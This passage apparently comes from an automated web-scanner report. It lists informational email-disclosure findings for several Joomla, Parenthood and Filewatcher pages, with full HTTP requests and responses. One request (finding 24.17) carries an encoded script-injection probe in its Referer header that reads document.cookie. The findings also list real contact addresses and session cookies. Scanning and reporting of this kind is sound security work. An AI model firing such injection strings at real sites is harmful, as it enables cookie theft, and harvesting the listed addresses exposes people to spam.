<a style="white-space: nowrap" href="/u/@WBRURlVTAhdC/">TenSafeF...@gmail.com</a>
...[SNIP]...

24.11. http://community.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • jugcalendar@opensourcematters.org

Request

GET / HTTP/1.1
Host: community.joomla.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.3.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 88b9e45a51b17bd9f961adad9aab4c54=04d74cf0b4f61e32b561da5cc9f02fc1; path=/
Last-Modified: Mon, 24 Jan 2011 02:20:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 33586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<a href="http://www.google.com/calendar/embed?src=jugcalendar@opensourcematters.org" target="_blank">
...[SNIP]...

24.12. http://community.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /index.php

Issue detail

The following email address was disclosed in the response:
  • jugcalendar@opensourcematters.org

Request

GET /index.php HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<a href="http://www.google.com/calendar/embed?src=jugcalendar@opensourcematters.org" target="_blank">
...[SNIP]...

24.13. http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.parenthood.com
Path:   /feed/get/type/rss/source/domain/id/40337

Issue detail

The following email addresses were disclosed in the response:
  • feeds@kickapps.com
  • webmaster@kickapps.com

Request

GET /feed/get/type/rss/source/domain/id/40337 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; as=40337

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: YUKUSESSID=nfe3mp9eu1on73emvsu6v31et7; expires=Tue, 08 Feb 2011 02:23:05 GMT; path=/; domain=community.parenthood.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 13:28:38 GMT
ETag: "a525764423c1a7805bf59a00d8bf4c7c"
Content-Disposition: inline; filename=rss-feed.rss
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: application/xml;charset=utf-8
Content-Length: 19977

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/css" href="/feed/bypass/styles/feed.css" media="screen"?>
<?xml-stylesheet type="text/xsl" href="/feed/bypass/styles/feed.xsl"?>
<rss
...[SNIP]...
<managingEditor>feeds@kickapps.com (FeedMaster)</managingEditor>
...[SNIP]...
<webMaster>webmaster@kickapps.com (WebMaster)</webMaster>
...[SNIP]...
<author>feeds@kickapps.com (naners123)</author>
...[SNIP]...
<author>feeds@kickapps.com (Elizabeth)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (Whats New)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (support)</author>
...[SNIP]...
<author>feeds@kickapps.com (support)</author>
...[SNIP]...
<author>feeds@kickapps.com (lizspicer)</author>
...[SNIP]...
<author>feeds@kickapps.com (RyanDJ)</author>
...[SNIP]...
<author>feeds@kickapps.com (engineermom21)</author>
...[SNIP]...
<author>feeds@kickapps.com (dana2010)</author>
...[SNIP]...
<author>feeds@kickapps.com (Cone50)</author>
...[SNIP]...
<author>feeds@kickapps.com (natasha9211)</author>
...[SNIP]...
<author>feeds@kickapps.com (NewMommy2010)</author>
...[SNIP]...
<author>feeds@kickapps.com (babs1402)</author>
...[SNIP]...
<author>feeds@kickapps.com (babs1402)</author>
...[SNIP]...
<author>feeds@kickapps.com (sunnysideup01)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (engineermom21)</author>
...[SNIP]...

24.14. http://community.parenthood.com/service/searchEverythingAsRss.kickAction

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.parenthood.com
Path:   /service/searchEverythingAsRss.kickAction

Issue detail

The following email address was disclosed in the response:
  • boards@parenthood.com

Request

GET /service/searchEverythingAsRss.kickAction?vars=service/searchEverything.kickAction&keywords=phnew&includeVideo=on&includeBlog=on&as=40337&quantity=25 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:22:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:22:48 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 140035

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...
<managingEditor>boards@parenthood.com (Parenthood)</managingEditor>
...[SNIP]...
<webMaster>boards@parenthood.com (Parenthood)</webMaster>
...[SNIP]...

24.15. http://demo.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • demosupport@cloudaccess.net

Request

GET / HTTP/1.1
Host: demo.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/download.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.8.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:21:23 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; expires=Sat, 05-Mar-2011 02:21:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:21:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en-gb"
   lang="en-gb"
...[SNIP]...
<a href="mailto:demosupport@cloudaccess.net">demosupport@cloudaccess.net</a>
...[SNIP]...

24.16. http://demo.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:
  • demosupport@cloudaccess.net
  • dom@cloudaccess.net

Request

GET /index.php?format=feed&type=rss HTTP/1.1
Host: demo.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; __utmb=228838275.1.10.1295835725;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:25:11 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:25:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 8770

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.5 - Open Source Content Management" -->
<?xml-stylesheet href="/plugins/system/jceutilities/css/jceutilities.css?v=224" type="text/css"
...[SNIP]...
<a href="mailto:demosupport@cloudaccess.net">demosupport@cloudaccess.net</a>
...[SNIP]...
<author>dom@cloudaccess.net (Administrator)</author>
...[SNIP]...

24.17. http://developer.joomla.org/media/system/js/mootools-more.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /media/system/js/mootools-more.js

Issue detail

The following email addresses were disclosed in the response:
  • erik@domain.com
  • espen@domene.no
  • fred@domain.com
  • fred@domain.hu
  • fred@domaine.com
  • fred@domein.nl
  • fred@dominio.com
  • jan@domena.pl
  • maria@bernasconi.ch
  • matti@meikalainen.com
  • max@mustermann.de
  • name@domain.com
  • nome@dominio.com

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/security/news.html?dce01%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e865402a94b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; 39f24a85b5d169a21046edfe6eaa5320=5ad2cfaafece06e83d5d1454ed554fa9

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:06:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
Last-Modified: Mon, 10 Jan 2011 19:52:34 GMT
ETag: "62cf68-36c85-499834f1e6480"
Accept-Ranges: bytes
Content-Length: 224389
Content-Type: application/javascript

MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...
na data valida com {date}",dateInFormatMDY:'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',email:'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',url:"Per favor introdueix una URL valida com http://www.google.com.",currencyDollar:"Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .",oneRequired:"Per favor introdueix alg
...[SNIP]...
SuchAs:"Zadejte pros..m platn.. datum jako {date}",dateInFormatMDY:'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',email:'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',url:"Zadejte pros..m platnou URL adresu jako http://www.google.com.",currencyDollar:"Zadejte pros..m platnou ....stku. Nap....klad $100.00.",oneRequired:"Zadejte pros..m alespo.. jednu hodnotu pro
...[SNIP]...
mrum og andre tegn er ikke tilladt.",dateSuchAs:"Skriv en gyldig dato som {date}",dateInFormatMDY:'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',email:'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',url:'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',currencyDollar:"Skriv et gldigt bel..b. F.eks Kr.100.00 .",oneRequired:"Et eller flere af felterne i denne formular skal udfyldes."
...[SNIP]...
InFormatMDY:"Geben Sie bitte ein g&uuml;ltiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. &quot;31.12.1999&quot;)",email:"Geben Sie bitte eine g&uuml;ltige E-Mail Adresse ein. Wie zum Beispiel &quot;maria@bernasconi.ch&quot;.",url:"Geben Sie bitte eine g&uuml;ltige URL ein. Wie zum Beispiel http://www.google.ch.",currencyDollar:"Geben Sie bitte einen g&uuml;ltigen Betrag in Schweizer Franken ein. Wie zum Beispiel 10
...[SNIP]...
date}&quot;).",dateInFormatMDY:"Geben Sie bitte ein g&uuml;ltiges Datum im Format TT.MM.JJJJ ein (z.B. &quot;31.12.1999&quot;).",email:"Geben Sie bitte eine g&uuml;ltige E-Mail-Adresse ein (z.B. &quot;max@mustermann.de&quot;).",url:"Geben Sie bitte eine g&uuml;ltige URL ein (z.B. &quot;http://www.google.de&quot;).",currencyDollar:"Geben Sie bitte einen g&uuml;ltigen Betrag in EURO ein (z.B. 100.00&#8364;).",oneRequi
...[SNIP]...
.lida como {date}",dateInFormatMDY:'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',url:"Por favor ingrese una URL v..lida como http://www.google.com.",currencyDollar:"Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .",oneRequired:"Por favor ingrese algo para
...[SNIP]...
da como {date}",dateInFormatMDY:'Por favor introduce una fecha v&aacute;lida como DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, introduce una direcci&oacute;n de email v&aacute;lida. Por ejemplo, "fred@domain.com".',url:"Por favor introduce una URL v&aacute;lida como http://www.google.com.",currencyDollar:"Por favor introduce una cantidad v&aacute;lida de .... Por ejemplo ...100,00 .",oneRequired:"Por favor in
...[SNIP]...

24.18. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/amd64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/6-stable/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 197
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.19. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZdEUUKqgOBWrwlZy7TjtZA"
Content-Length: 20741
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 195
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.20. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/ia64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/6-stable/ia64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 194
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.21. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+zdjYtQZqpO3zHKlkKVj6Q"
Content-Length: 25529
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 192
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.22. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/sparc64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/6-stable/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 193
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.23. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8+frb9HphK5dyFIISMCQmg"
Content-Length: 26078
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 190
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.24. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.2-release/sparc64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/6.2-release/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 234
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.25. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IX+4NbTcwTYmvINLD7P4yg"
Content-Length: 22277
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
